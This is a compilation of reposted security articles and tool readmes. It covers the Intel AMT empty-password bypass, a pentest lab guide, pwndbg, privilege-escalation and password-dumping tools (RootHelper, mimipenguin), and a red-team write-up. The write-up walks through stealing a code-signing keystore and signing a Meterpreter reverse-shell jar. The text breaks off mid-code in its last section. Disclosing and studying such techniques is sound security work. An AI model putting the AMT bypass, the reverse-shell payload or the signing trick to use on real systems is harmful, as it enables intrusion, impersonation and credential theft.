You can remotely commandeer and control workstations and servers that use vulnerable Intel chipsets – by sending them empty authentication strings. You read that right. When you're expected to send a password hash, you send zero bytes. Nada. And you'll be rewarded with powerful low-level access to the box's hardware from across the network – or across the internet if the management interface faces the public web.

Intel provides a remote management toolkit called AMT for its business and enterprise-friendly processors; this technology is part of Chipzilla's vPro suite and runs at the firmware level, below and out of sight of Windows, Linux, or whatever operating system you're using. It's designed to allow IT admins to remotely log into the guts of computers so they can reboot them, repair and tweak operating systems, install new OSes, access virtual serial consoles, or gain full-blown remote desktop access to the machines via VNC. It is, essentially, god-mode on a machine.

Normally, AMT is password protected. This week it emerged that this authentication can be bypassed, allowing miscreants to take over systems from afar or once inside a corporate network. This critical security bug was designated CVE-2017-5689. While Intel has patched its code, people have to extract the necessary firmware updates from their hardware suppliers before they can be installed. Today we've learned it is trivial to exploit this flaw – and we're still waiting for those patches.

AMT is accessed over the network via a bog-standard web interface. This prompts the admin for a password, and this passphrase is sent over by the web browser using standard HTTP Digest authentication: the username, password, and realm are hashed using a nonce from the AMT firmware, plus a few other bits of metadata.
This scrambled response is checked by Intel's AMT software to be valid, and if so, access is granted to the management interface. But if you send an empty response, the firmware thinks this is valid and lets you through. This means if you use a proxy, or otherwise set up your browser to send empty HTTP Digest authentication responses, you can bypass the password checks.

This is according to firmware reverse-engineering by Embedi [PDF], which reported the flaw to Intel in March, and Tenable, which poked around and came to the same conclusion earlier this week. Intel has published some more info on the vulnerability here, which includes links to a tool to check if your system is at risk here, and mitigations.

We're told the flaw is present in some, but not all, Intel chipsets back to 2010: if you're using vPro and AMT versions 6 to 11.6 on your network – including Intel's Standard Manageability (ISM) and Small Business Technology (SBT) features – then you are potentially at risk.

Sursa: https://www.theregister.co.uk/2017/05/05/intel_amt_remote_exploit/
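To make the bypass concrete, here is a hedged sketch of the kind of Authorization header an attacker's proxy would emit. The username, realm, nonce and URI values below are made up for illustration; the only essential part is that the response field, which should carry the password hash, is left empty:

```python
def empty_digest_header(username, realm, nonce, uri):
    """Build an HTTP Digest Authorization header whose response field is
    empty -- the zero-byte 'hash' that vulnerable AMT firmware accepted."""
    return ('Digest username="%s", realm="%s", nonce="%s", uri="%s", '
            'response=""' % (username, realm, nonce, uri))

# Placeholder values, not real AMT defaults.
print(empty_digest_header("admin", "Digest:0001", "deadbeef", "/index.htm"))
```

A client or intercepting proxy that replaces the computed digest with this header is all the "exploit" amounts to.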
Hidviz

Hidviz is a GUI application for in-depth analysis of USB HID class devices. The two main use cases of this application are reverse-engineering existing devices and developing new USB HID devices.

The USB HID class consists of many possible devices, e.g. mice, keyboards, joysticks and gamepads. But that's not all! There are more exotic HID devices, e.g. weather stations, medical equipment (thermometers, blood pressure monitors) or even simulation devices (think of flight sticks!).

1) Building

Hidviz can be built on various platforms where the following prerequisites can be obtained. Currently only Fedora, Ubuntu and MSYS2/Windows are supported and a build guide is available for them.

1.1) Prerequisites

C++ compiler with C++14 support
libusb 1.0 (may be called libusbx in your distro)
protobuf (v2 is enough)
Qt5 base
CMake (>=3.2)

1.1.1) Installing prerequisites on Fedora

sudo dnf install gcc-c++ gcc qt5-qtbase-devel protobuf-devel libusbx-devel

1.1.2) Installing prerequisites on Ubuntu

sudo apt-get install build-essential qtbase5-dev libprotobuf-dev protobuf-compiler libusb-1.0-0-dev

Note that Ubuntu 14.04 LTS ships a gcc too old to build hidviz; you need to install at least gcc 5.

1.1.3) Installing prerequisites on MSYS2/Windows

Please note hidviz is primarily developed on Linux and we currently don't have Windows CI, so the Windows build can be broken at any time. If you find it broken, please create an issue. If you do not have MSYS2 installed, first follow this guide to install MSYS2.

pacman -S git mingw-w64-x86_64-cmake mingw-w64-x86_64-qt5 mingw-w64-x86_64-libusb \
    mingw-w64-x86_64-protobuf mingw-w64-x86_64-protobuf-c mingw-w64-x86_64-toolchain \
    make

1.2) Clone and prepare an out-of-source build

First you need to obtain the sources from git and prepare a directory for an out-of-source build:

git clone --recursive https://github.com/ondrejbudai/hidviz.git
mkdir hidviz/build
cd hidviz/build

Please note you have to do a recursive clone.
1.3) Configuring

1.3.1) Configuring on Fedora/Ubuntu (Linux)

cmake ..

1.3.2) Configuring on MSYS2/Windows

cmake -G "Unix Makefiles" ..

1.4) Build

make -j$(nproc)

If you are doing an MSYS2 build, check that you are using the MinGW32/64 shell before building, otherwise the build process won't work. More information can be found here.

2) Running

For hidviz to work properly, build/hidviz must be your current directory. After a successful build, run:

cd hidviz
./hidviz

3) Installing

Not yet available

4) License

Hidviz is licensed under GPLv3+. For more information see the LICENSE file.

Sursa: https://github.com/ondrejbudai/hidviz/
Thursday, May 4, 2017

Pentest Home Lab - 0x0 - Building a virtual corporate domain

Whether you are a professional penetration tester or want to become one, having a lab environment that includes a full Active Directory domain is really helpful. There have been many times where in order to learn a new skill, technique, exploit, or tool, I've had to first set it up in an AD lab environment. Reading about attacks and understanding them at a high level is one thing, but I often have a hard time really wrapping my head around something until I've done it myself.

Take Kerberoasting for example: Between Tim's talk a few years back, Rob's posts, and Will's post, I knew what was happening at a high level, but I didn't want to try out an attack I'd never done before in the middle of an engagement. But before I could try it out for myself, I had to first figure out how to create an SPN. So off to Google I went, and then off to the lab:

I set up MSSQL on a domain-connected server in my home lab
I created a new user in my AD
I created a SPN using setspn, pairing the new user to the MSSQL instance
I used Empire to grab the SPN hash as an unprivileged domain user (So cool!!)
I sent the SPN hash to the password cracker and got the weak password

THAT was a fun night!

So back to the goal of this blog series. I'll share what I've learned while building my own lab(s), I'll share some of the things I've done in my lab to try and improve my skills, and for every attack I cover, I'll also cover how to set up your lab environment.

Selecting Your Virtualization Stack

QUESTION: Should I build this in the cloud or on premises?

Before we can get to any of the hacking, we need to talk about where you are going to install your virtual environment. In fact, your home lab doesn't even need to be located within your home.
I'll give an overview of each option, but the decision will likely be influenced by what hardware you have lying around, how much you want to spend up front, and how much you will be using your lab. In the end, you might even want to try more than one option, as they all have distinct benefits.

Cloud Based

Often, building a home lab using dedicated hardware is cost prohibitive. In addition to hardware costs, if you add Windows licensing costs, a traditional home lab can get really expensive. The good news is these days you don't need to buy any hardware or software (OS). You can build your lab using AWS, Azure, Google, etc. In addition to not having to purchase hardware, another major advantage of building your lab in the cloud is that the Windows licensing costs are built into your hourly rate (at least for AWS -- I'm not as familiar with Azure or Google).

Pros

Hardware: No hardware purchases
OS Licensing: No Windows OS software purchases; no expiring Windows eval licenses
Hourly Pricing: You only pay for the time you use the lab machines
Education: You will learn a lot about the cloud stack you are building on

Cons

Cost: Leaving your instances running gets pretty expensive. Four Windows servers (t2.micro) running 24/7 will put you at around 45 bucks a month
Keeping track of instances: If you don't want them running all the time, you will have to remember to shut down instances when not in use or configure CloudWatch to do that for you
You can't pause instances: In AWS at least, you can't pause VMs like you can with virtualization software.
This is pretty annoying if you are used to pausing your VMs at the end of each session and picking up where you left off
Limited Windows OS Support: No Windows 7/8/10 images (might be AWS specific)
Some testing activities need to be approved: You'll have to notify the cloud provider if you want to attack your instances from outside your virtual private cloud (VPC)

AWS Math

AWS can be cheap, or it can get very expensive, depending on how you use it. The key here is to think about how much you will be using your lab. If you think you will play in your lab around 3 hours a night about 10 nights a month, AWS makes a lot of sense. If you are going to be running your hosts permanently, it will probably be more cost effective to run your lab on premises. Here are some cost estimations using AWS's cost estimator:

2 Windows instances, 1 Kali instance
4 Windows instances, 1 Kali instance

As you can see, the difference is pretty extreme. Remember to turn off those instances when not in use!

One caveat with building your lab entirely in the cloud, at least with AWS, is that AWS does not offer an AMI for Windows 7/8/10. While it appears possible to use your own Windows 7/8/10 image, now you are back to either using eval licenses or paying for them. While doing research for this blog series, I came across something called AWS Workspaces, and even that does not use 7/8/10. It simulates a desktop environment using Microsoft's Desktop Experience via Windows Server 2012. After playing around with Amazon Workspaces, I realized it is not the best option for a pentest lab due to monthly costs ($7 per month per workstation), but I did learn you don't really NEED Windows 7/8/10 in your pentest home lab to do most of what we will want to do, which was a good lesson.

In an upcoming post, I will write in detail about Building your AD lab on AWS.
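The arithmetic behind that comparison is easy to sanity-check. The hourly rate below is an illustrative assumption reverse-engineered from the roughly 45-dollars-a-month figure quoted above (four Windows t2.micro instances running 24/7), not an actual AWS price:

```python
# Assumed per-instance hourly rate, derived from ~$45/month for four
# Windows t2.micro instances running around the clock (~730 hours/month).
RATE_PER_INSTANCE_HOUR = 45.0 / (4 * 730)

def monthly_cost(instances, hours_per_month, rate=RATE_PER_INSTANCE_HOUR):
    """Back-of-envelope monthly bill for a lab of identical instances."""
    return instances * hours_per_month * rate

always_on = monthly_cost(4, 730)      # running 24/7
on_demand = monthly_cost(4, 3 * 10)   # 3 hours a night, 10 nights a month
print("24/7: $%.2f  vs  30h/month: $%.2f" % (always_on, on_demand))
```

At that assumed rate, the "3 hours a night, 10 nights a month" pattern works out to under two dollars a month for the same four instances, which is why shutting instances down matters so much.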
On Premises

If you are going to build the lab on your own hardware, the next decision you need to make is: Do I use dedicated hardware and a hypervisor, or do I run software that sits on top of my host OS like VMware Workstation Pro, Workstation Player, VMware Fusion (Mac), or VirtualBox?

Using your Desktop/Laptop

If you have a desktop/laptop that has plenty of resources to spare, there is no reason you can't set this entire environment up on your OS of choice using either VMware or VirtualBox. On my laptop, I use VMware Workstation and have a test domain with 1 domain controller, 1 additional Windows server, and 1 Windows 7 host. With a 1TB HDD and 16GB of RAM, I can run all three if I need to, and Kali at the same time. If you can swing 32GB and a bigger SSD, that would give you even more flexibility. As I mentioned in the cons above, you might be limited. My current laptop can't take more than 16GB.

Pros

Mobility: Take your lab with you wherever you go (if you have a laptop)
Easy entry: You probably already have a desktop/laptop that you can use
Free options: VirtualBox and VMware Workstation Player are free

Cons

Cost: VMware Workstation Pro (Windows) and VMware Fusion (Mac) are not free
Hardware limitations: Your current desktop/laptop might be limited in how much memory you can add to it
Shared resourcing: You are competing for shared resources on your host OS. This might not be acceptable. Every time you need to reboot your host OS, you have to stop/pause all of your VMs

Using a Hypervisor

Most penetration testers that I know still keep it traditional and use dedicated hardware combined with a hypervisor for their home lab. There are plenty of great articles that talk about hardware requirements and options. I have friends who prefer to go the route of buying old enterprise hardware on eBay, but I have always just used consumer hardware. Either way, between the RAM and fast disks, it can get expensive.
On my server, I have an AMD 8-core chip circa 2015, and I just upgraded from 16 to 32GB of RAM, and from a 512GB SSD to a 1TB SSD. If you can afford it, avoid the mistake I made and just go right to 32GB of RAM and a 1TB SSD. That will give you more than enough room to grow your lab, make templates, take lots of snapshots, etc.

Pros

Flexibility: With dedicated hardware, you can isolate the lab on its own network, VLAN, etc.
Software cost: There are plenty of free options when it comes to hypervisors
Options: You can take advantage of things like KVM, containers, and thin provisioning
Portability: If you use something small like an Intel NUC, your lab can be portable

Cons

Energy inefficient: The last thing anyone who reads this post needs is yet another computer running 24/7
Cost: Unless you have something laying around already, you'll have to buy new hardware
Vendor-specific knowledge: Do you have the time and desire to learn all of the hypervisor-specific troubleshooting commands when something breaks?

Great Home Lab Resources

Home Lab Design by Carlos Perez
My new home lab setup by Carlos Perez
Building an Effective Active Directory Lab Environment for Testing by Sean Metcalf
Intel NUC Super Server by Mubix

Over the years I've played with a few of the popular hypervisors, and here are my thoughts:

VMware ESXi - My first lab was ESXi. If you've never used it, I recommend using this as your hypervisor if for no other reason than it is ubiquitous in the enterprise. You will find ESX on every internal pentest, and having experience with it from your home lab will help you one day.

Citrix Xen - Eventually my ESXi hard drive failed. After reading this post by Mubix, when I rebuilt, I tried Citrix's Xen Server. I liked Xen, but I quickly ran out of space on my 512GB SSD, and when I added a second drive it started to freak out.
The number of custom Xen commands I had to learn was getting out of control, and I didn't feel like the experience was going to help me all that much, so I pulled the plug and looked for something new.

Proxmox VE - For my third iteration, I'm using Proxmox VE, after my friend @mikehacksthings gave a presentation on it at a recent @IthacaSec meeting. I really like it! Thin provisioning means it uses a lot fewer resources, and it seems lightning fast compared to ESXi and Xen. It definitely has my stamp of approval so far. In an upcoming post, I'm going to write in detail about building your AD lab on premises using Proxmox.

Getting Windows Server Software

If you are going to build your lab in the cloud, you can just relax and skip this section. If you are going to build on premises, you will need to get your hands on the following software:

Required - Windows Server (2012 or 2016)
Optional - Windows 7 (or 8 or 10)

In terms of getting the software, there are a few options:

Download evaluation versions, which are good for 180 days.
See if your workplace has a key/iso that can be used in a lab environment.
Go with a cloud solution like AWS or Azure where the licensing costs are built into your hourly rate.
I think if you are a student you can get the OSes for free.

For more detail on these options, check out Sean Metcalf's blog post: Building an Effective Active Directory Lab Environment for Testing. You will also notice that Sean gives some really useful breakdowns of what he feels you need in an AD lab. I'm going to keep this series more basic than that, but I encourage you to read his post.

Let's create a Domain

Once you have selected your virtualization stack, it is time to configure it. The following two posts take you through setting up two AD lab environments: one in the cloud using AWS, and another on premises using Proxmox VE.
Pentest Home Lab - 0x1 - Building Your AD Lab on AWS
Pentest Home Lab - 0x2 - Building Your AD Lab on Premises (Coming Soon)

Wrap-Up

Feedback, suggestions, corrections, and questions are welcome!

Posted by Seth Art at 5:32 PM

Sursa: https://sethsec.blogspot.ro/2017/05/pentest-home-lab-0x0-building-virtual.html
pwndbg

pwndbg (/poʊndbæg/) is a GDB plug-in that makes debugging with GDB suck less, with a focus on features needed by low-level software developers, hardware hackers, reverse-engineers and exploit developers. It has a boatload of features, see FEATURES.md.

Why?

Vanilla GDB is terrible to use for reverse engineering and exploit development. Typing x/g30x $esp is not fun, and does not confer much information. The year is 2016 and GDB still lacks a hexdump command. GDB's syntax is arcane and difficult to approach. Windbg users are completely lost when they occasionally need to bump into GDB.

What?

Pwndbg is a Python module which is loaded directly into GDB, and provides a suite of utilities and crutches to hack around all of the cruft that is GDB and smooth out the rough edges. Many other projects from the past (e.g. gdbinit, PEDA) and present (e.g. GEF) exist to fill some of these gaps. Unfortunately, they're all either unmaintained, unmaintainable, or not well suited to easily navigating the code to hack in new features (respectively). Pwndbg exists not only to replace all of its predecessors, but also to have a clean implementation that runs quickly and is resilient against all the weird corner cases that come up.

How?

Installation is straightforward. Pwndbg is best supported on Ubuntu 14.04 with GDB 7.7, and Ubuntu 16.04 with GDB 7.11.

git clone https://github.com/pwndbg/pwndbg
cd pwndbg
./setup.sh

If you use any other Linux distribution, we recommend using the latest available GDB built from source. Be sure to pass --with-python=/path/to/python to configure.

What can I do with that?

For further info about features/functionalities, see FEATURES.

Who?

Most of Pwndbg was written by Zach Riggle, with many other contributors offering up patches via Pull Requests. Want to help with development? Read CONTRIBUTING.

Contact

If you have any questions not worthy of a bug report, feel free to ping ebeip90 at #pwndbg on Freenode and ask away. Click here to connect.
Link: https://github.com/pwndbg/pwndbg
PHP Vulnerability Hunter

Overview

PHP Vulnerability Hunter is an advanced whitebox PHP web application fuzzer that scans for several different classes of vulnerabilities via static and dynamic analysis. By instrumenting application code, PHP Vulnerability Hunter is able to achieve greater code coverage and uncover more bugs.

Key Features

Automated Input Mapping
While most web application fuzzers rely on the user to specify application inputs, PHP Vulnerability Hunter uses a combination of static and dynamic analysis to automatically map the target application. Because it works by instrumenting the application, PHP Vulnerability Hunter can detect inputs that are not referenced in the forms of the rendered page.

Several Scan Modes
PHP Vulnerability Hunter is aware of many different types of vulnerabilities found in PHP applications, from the most common such as cross-site scripting and local file inclusion to the lesser known, such as user controlled function invocation and class instantiation. PHP Vulnerability Hunter can detect the following classes of vulnerabilities:

Arbitrary command execution
Arbitrary file read/write/change/rename/delete
Local file inclusion
Arbitrary PHP execution
SQL injection
User controlled function invocation
User controlled class instantiation
Reflected cross-site scripting (XSS)
Open redirect
Full path disclosure

Code Coverage
Get measurements of how much code was executed during a scan, broken down by scan plugin and page. Code coverage can be calculated at either the function level or the code block level.

Scan Phases

Initialization Phase
During this phase, interesting function calls within each code file are hooked, and if code coverage is enabled the code is annotated. Static analysis is performed on the code to detect inputs.

Scan Phase
This is where the bugs are uncovered.
PHP Vulnerability Hunter iterates through its different scan plugins and plugin modes, scanning every file within the targeted application. Each time a page is requested, dynamic analysis is performed to discover new inputs and bugs.

Uninitialization
Once the scan phase is complete, all of the application files are restored from backups made during the initialization phase.

Link: https://www.autosectools.com/PHP-Vulnerability-Scanner
RootHelper

Roothelper will aid in the process of privilege escalation on a Linux system that has been compromised, by fetching a number of enumeration and exploit suggestion scripts. The latest version downloads five scripts: two enumeration shell scripts, one information-gathering shell script and two exploit suggesters, one written in Perl and the other one in Python. The credits for the scripts it fetches go to the original authors.

Note

I've recently added a new script to my Github that follows the general principles of this script, however it aims to be more comprehensive with regards to its capabilities. Besides downloading scripts that aid in privilege escalation on a Linux system, it also comes with functionality to enumerate the system in question, search for cleartext credentials and much more. It is in many regards RootHelper's successor and it can be found by clicking here.

Priv-Esc scripts

LinEnum - Shellscript that enumerates the system configuration.
unix-privesc-check - Shellscript that enumerates the system configuration and runs some privilege escalation checks as well.
Firmwalker - Shellscript that gathers useful information by searching the mounted firmware filesystem for things such as SSL and web server related files, config files, passwords, common binaries and more.
linuxprivchecker - A Python implementation to suggest exploits particular to the system that's been compromised.
Linux_Exploit_Suggester - A Perl script that does the same as the one mentioned above.

Usage

To use the script you will need to get it on the system you've compromised; from there you can simply run it and it will show you the options available and an informational message regarding the options. For clarity I will post it below as well.

The 'Help' option displays this informational message. The 'Download' option fetches the relevant files and places them in the /tmp/ directory.
The option 'Download and unzip' downloads all files and extracts the contents of zip archives to their individual subdirectories respectively; please note: if the 'mkdir' command is unavailable, however, the operation will not succeed and the 'Download' option should be used instead. The 'Clean up' option removes all downloaded files and 'Quit' exits roothelper.

Credits for the other scripts go to their original authors.

https://github.com/rebootuser/LinEnum
https://github.com/PenturaLabs/Linux_Exploit_Suggester
http://www.securitysift.com/download/linuxprivchecker.py
https://github.com/pentestmonkey/unix-privesc-check
https://github.com/craigz28/firmwalker

Link: https://github.com/NullArray/RootHelper
mimipenguin

A tool to dump the login password from the current Linux desktop user. Adapted from the idea behind the popular Windows tool mimikatz.

Details

Takes advantage of cleartext credentials in memory by dumping the process and extracting lines that have a high probability of containing cleartext passwords. Will attempt to calculate each word's probability by checking hashes in /etc/shadow, hashes in memory, and regex searches. Requires root permissions.

Supported/Tested Systems

Kali 4.3.0 (rolling) x64 (gdm3)
Ubuntu Desktop 12.04 LTS x64 (Gnome Keyring 3.18.3-0ubuntu2)
Ubuntu Desktop 16.04 LTS x64 (Gnome Keyring 3.18.3-0ubuntu2)
XUbuntu Desktop 16.04 x64 (Gnome Keyring 3.18.3-0ubuntu2)
Archlinux x64 Gnome 3 (Gnome Keyring 3.20)
VSFTPd 3.0.3-8+b1 (Active FTP client connections)
Apache2 2.4.25-3 (Active/Old HTTP BASIC AUTH Sessions) [Gcore dependency]
openssh-server 1:7.3p1-1 (Active SSH connections - sudo usage)

Notes

Password moves in memory - still honing in on 100% effectiveness
Plan on expanding support and other credential locations
Working on expanding to non-desktop environments
Known bug - sometimes gcore hangs the script; this is a problem with gcore
Open to pull requests and community research
LDAP research (nslcd, winbind, etc.) planned for the future

Development Roadmap

MimiPenguin is slowly being ported to multiple languages to support all possible post-exploit scenarios. The roadmap below was suggested by KINGSABRI to track the various versions and features. An "X" denotes full support while a "~" denotes a feature with known bugs.
Feature                                            | .sh | .py
GDM password (Kali Desktop, Debian Desktop)        |  ~  |  X
Gnome Keyring (Ubuntu Desktop, ArchLinux Desktop)  |  X  |  X
VSFTPd (Active FTP Connections)                    |  X  |  X
Apache2 (Active HTTP Basic Auth Sessions)          |  ~  |  ~
OpenSSH (Active SSH Sessions - Sudo Usage)         |  ~  |  ~

Contact

Twitter: @huntergregal
Website: huntergregal.com
Github: huntergregal

Licence

CC BY 4.0 licence - https://creativecommons.org/licenses/by/4.0/

Special Thanks

the-useless-one for removing Gcore as a dependency, cleaning up tabs, adding an output option, and a full python3 port
gentilkiwi for Mimikatz, the inspiration and the twitter shoutout
pugilist for cleaning up PID extraction and testing
ianmiell for cleaning up some of my messy code
w0rm for identifying a printf error when special chars are involved
benichmt1 for identifying the multiple authenticated users issue
ChaitanyaHaritash for identifying special char edge case issues
ImAWizardLizard for cleaning up the pattern matches with a for loop
coreb1t for python3 checks, arch support, other fixes
n1nj4sec for a python2 port and support
KINGSABRI for the Roadmap proposal
bourgouinadrien for linking https://github.com/koalaman/shellcheck

Link: https://github.com/huntergregal/mimipenguin
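The core heuristic described above, dumping process memory and pulling out printable runs that can then be tested against the hashes in /etc/shadow, can be sketched in a few lines. This is an illustration on a synthetic buffer, not mimipenguin's actual implementation; the real tool reads /proc/<pid>/maps and /proc/<pid>/mem as root:

```python
import re

# Printable ASCII runs of 6-64 bytes are plausible password candidates.
CANDIDATE = re.compile(rb'[\x20-\x7e]{6,64}')

def candidate_strings(memory: bytes):
    """Extract printable runs from a raw memory dump. Each candidate would
    then be hashed (e.g. with crypt.crypt and the salt from /etc/shadow)
    and compared against the stored hash to confirm a cleartext password."""
    return [m.group().decode() for m in CANDIDATE.finditer(memory)]

# Synthetic dump: two candidate runs separated by non-printable bytes.
fake_dump = b'\x00\x01gnome-keyring\x00\xffhunter22!\x07\x00ab'
print(candidate_strings(fake_dump))  # ['gnome-keyring', 'hunter22!']
```

The probability scoring mimipenguin layers on top (hash checks, regex hints for known keyring layouts) is what separates real passwords from the noise this naive scan produces.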
Apache and Java Information Disclosures Lead to Shells
26 January 2017

Overview

During a recent Red-Team engagement, we discovered a series of information disclosures on a site, allowing our team to go from zero access to full compromise in a matter of hours. Information disclosures in Apache HTTP servers with mod_status enabled allowed our team to discover .jar files hosted on the site. Static values within exposed .jar files allowed our team to extract the client's code signing certificate and sign malicious Java executables as the client. These malicious .jar files were used in a successful social engineering campaign against the client. These typically overlooked, but easily mitigated, vulnerabilities quickly turned into a path to full compromise.

We won't go into much detail about the steps taken after the initial compromise. We'll save that for another blog. Now for the fun stuff…

Apache Mod_Status

Apache mod_status is an Apache module allowing administrators to view quick status information by navigating to the /server-status page, i.e. https://www.apache.org/server-status. This isn't necessarily a vulnerability on its own, but when implemented in public-facing production environments, it can provide attackers a treasure-trove of useful information, especially when the ExtendedStatus option is configured.

During our OSINT phase of the engagement, we incorporate a series of Google Dorks, including searching for enabled mod_status:

site:<site> inurl:"server-status" intext:"Apache Server Status for"

Alternatively, given a range of IPs instead of a URL, you can use a Bash "for" loop, like the following, to search for /server-status pages:

for i in `cat IPs.txt`; do echo $i & curl -ksL -m2 https://$i/server-status | head -n 5 | grep "Status" ; done > output.txt

However, the loop above will query the server, making it NOT OpSec friendly. Use with caution if stealth is key on an engagement.

So why do we dork for server-status?
Because among the valuable information disclosed, such as server version, uptime, and process information, the ExtendedStatus option displays recent HTTP requests to the server. If recent requests contain authorization information, such as tokens, you can see why this page would be valuable to an attacker. In a lot of cases this dork doesn't come back with any results, but in this scenario, we found several systems with both mod_status and ExtendedStatus configured. What made this even more interesting was that several HTTP requests were made for files with .jar extensions:

A quick test, using wget, shows this page is accessible without authenticating, and we grab the rt.jar file for further examination. We wanted to examine all the jars; so, with a quick curl, we were able to list all requests containing the .jar extension:

curl http://<site>/server-status | grep GET | cut -d ">" -f9 | cut -d " " -f2 | grep jar > jars.txt

Using a quick Bash "for" loop, we grabbed all the files using wget:

for i in `cat jars.txt` ; do wget http://127.0.0.1$i ; done

You can also navigate to the page and click all the links to download each file, but we were operating from a C2 server with no GUI, so Bash+Wget was necessary.

Java Static Values

After downloading the jars locally for examination, we used a Java decompiler to examine the code. Our preference is JD-Gui (https://github.com/java-decompiler/jd-gui), but there are plenty of other options out there for decompilers. After examining the files, it was quickly apparent that several static values were used in the JARs, including passwords, UIDs, and local paths. The biggest finding, however, was the Keystore password found in the POM.xml file located in the print.jar applet:

A Java Keystore is used to store authorization or encryption certificates in Java applications. These typically provide the applet with the ability to authenticate to a service or encryption over HTTPS.
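If shell one-liners like the curl pipeline above feel fragile (they depend on the exact column layout of the status table), the same harvesting step can be done with a small script. The regex and the sample HTML below are illustrative, not taken from the engagement:

```python
import re

# ExtendedStatus pages embed each recent request in an HTML table cell,
# e.g. "GET /applets/print.jar HTTP/1.1". Pull out the .jar paths.
JAR_REQ = re.compile(r'GET\s+(/\S*?\.jar)\b')

def jar_paths(server_status_html: str):
    """Return the unique .jar paths seen in the request lines."""
    return sorted(set(JAR_REQ.findall(server_status_html)))

# Synthetic sample of a server-status fragment.
sample = ("<td>GET /applets/print.jar HTTP/1.1</td>"
          "<td>GET /applets/rt.jar HTTP/1.1</td>"
          "<td>GET /index.html HTTP/1.1</td>")
print(jar_paths(sample))  # ['/applets/print.jar', '/applets/rt.jar']
```

The resulting list can be fed straight to wget, exactly like jars.txt in the shell version.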
The XML file in the screenshot above provided the Keystore name, alias, and password: all we needed to find the Keystore. Luckily the Keystore was stored in the rt.jar file that was also accessible without authentication, and already in our possession. We simply unzipped the rt.jar file to extract the AppletSigningKeystore2016.jks file:

unzip rt.jar

Using the hardcoded Keystore password we discovered in the print.jar applet, we could open the Keystore and export the code signing certificate:

keytool -exportcert -keystore AppletSigningKeystore2016.jks -alias JAR -file cert.der

Using OpenSSL, we converted the certificate to a human-readable .crt format:

openssl x509 -inform der -in cert.der -out cert.crt

Further digging into the discovered jars indicated that the client used the certificate in the Keystore to sign other applets.

Creating Signed Malicious JARs

After determining that the AppletSigningKeystore2016.jks Keystore contained the client's code signing certificate, we shifted our efforts to creating a Java payload with a reverse shell. The payload we used was tailored to the client, but here's an example of using msfvenom to create a simple JAR file with an embedded Meterpreter shell:

msfvenom -p java/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=4444 -f raw -o payload.jar

Using the jarsigner application provided in Java's JDK, we were then able to sign the payload with the AppletSigningKeystore2016.jks Keystore containing the client's code signing certificate:

jarsigner -keystore AppletSigningKeystore2016.jks payload.jar JAR

This made it appear as if the client had created the application themselves, thus increasing the likelihood that a user would execute the file and give us a shell.

Wrap-up

So now we had a functioning payload, signed by the client, ready to use against their users. All it took was a little effort during the recon phase, attention to detail, and a tiny bit of Java knowledge.
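Because a .jar is just a zip archive, the unzip step can also be scripted; this sketch uses only the standard library (function name and suffix default are mine):

```python
import io
import zipfile

def extract_member(jar_bytes: bytes, suffix: str = ".jks") -> dict:
    """Return {name: bytes} for every member of the jar matching suffix."""
    out = {}
    with zipfile.ZipFile(io.BytesIO(jar_bytes)) as z:
        for name in z.namelist():
            if name.endswith(suffix):
                out[name] = z.read(name)
    return out
```

Running this over the downloaded rt.jar would surface the AppletSigningKeystore2016.jks file without needing any Java tooling on the attacking host.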
In many cases it's easy to overlook what would normally be considered a minor vulnerability, but in this case, not overlooking these tiny details led to full compromise of the client's network. We won't go into any details about the social engineering campaign, because all it takes is one user to click a link or run an executable, and it becomes an internal pentest. Let's just say we got a few shells. It's also worth noting that malware developers are actively code-signing their malware with stolen certificates. Here's a more recent example of a code-signing technique being utilized to spread malware: https://www.symantec.com/connect/blogs/suckfly-revealing-secret-life-your-code-signing-certificates

There are a few things to take away from this as security professionals:

Disable Apache mod_status on production servers.
Where possible, utilize an authentication mechanism when hosting applets that contain sensitive functionality, i.e. make users log in to download applets.
Scrub the code of your applets to remove any potential information disclosures.
References

Information on the Apache mod_status module
https://httpd.apache.org/docs/2.4/mod/mod_status.html

Apache mod_status module, ExtendedStatus directive
https://httpd.apache.org/docs/2.4/mod/core.html#extendedstatus

Apache authentication and authorization
https://httpd.apache.org/docs/2.4/howto/auth.html
https://httpd.apache.org/docs/2.4/howto/access.html

Java JDK
http://www.oracle.com/technetwork/java/javase/downloads/jdk8-downloads-2133151.html

JD-GUI
https://github.com/java-decompiler/jd-gui

DigitalOcean, Java Keytool Essentials: Working with Java Keystores
https://www.digitalocean.com/community/tutorials/java-keytool-essentials-working-with-java-keystores

DigitalOcean, OpenSSL Essentials: Working with SSL Certificates, Private Keys and CSRs
https://www.digitalocean.com/community/tutorials/openssl-essentials-working-with-ssl-certificates-private-keys-and-csrs#convert-certificate-formats

Richard De La Cruz

Source: http://threat.tevora.com/apache-and-java-information-disclosures-lead-to-shells/
Cryptoknife

Cryptoknife is an open source portable utility to allow hashing, encoding, and encryption through a simple drag-and-drop interface. It also comes with a collection of miscellaneous tools. The mainline branch officially supports Windows and Mac. Cryptoknife is free and licensed GPL v2 or later. It can be used for both commercial and personal use. Cryptoknife works by checking boxes for the calculations and then dragging files in to run them. Cryptoknife performs the work from every checked box on every tab, displays the output in the log, and saves it to a log file. By default, very common hashing boxes are pre-checked.

Support

Twitter: @NagleCode
You may also track this project on GitHub.
Secure Anonymous Email: Contact me

Settings and Log

For Windows, the settings are saved as cryptoknife_settings.ini inside the run-time directory. The log file, cryptoknife.log, is also in the run-time directory. For Mac, settings are saved in Library/Application Support/com.cryptoknife/cryptoknife_settings.ini. The log file is cryptoknife.log and is saved in your Downloads directory. Settings are saved when the app exits. The log is saved whenever the console is updated.

Hashing

Simply check the boxes for the algorithms to use, and then drag-and-drop your directory or file.

MD5, MD4, MD2
SHA-1, SHA-224, SHA-256, SHA-384, SHA-512
CRC-32 Checksum

There is also direct input available. Cryptoknife will perform all hashing algorithms on direct input.

Encoding

Except for line-ending conversion, Cryptoknife appends a new file extension when performing its work. However, it is still very easy to drag-and-drop and encode/encrypt thousands of files. With great power comes great responsibility.

Base64
HEX/Binary
DOS/Unix EOL

There is also direct input available. Results are displayed (which may not be viewable for binary results).

Encryption

All the encryption algorithms use CBC mode. You may supply your own Key/IV or generate a new one.
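The hashing tab's behavior, every checked algorithm run over the same input, can be sketched in a few lines of Python. This is an illustration of the idea, not Cryptoknife's code (MD4 and MD2 are omitted because Python's hashlib does not guarantee them):

```python
import hashlib
import zlib

def digest_report(data: bytes) -> dict:
    """Compute the common digests Cryptoknife's hashing tab lists."""
    report = {
        name: hashlib.new(name, data).hexdigest()
        for name in ("md5", "sha1", "sha224", "sha256", "sha384", "sha512")
    }
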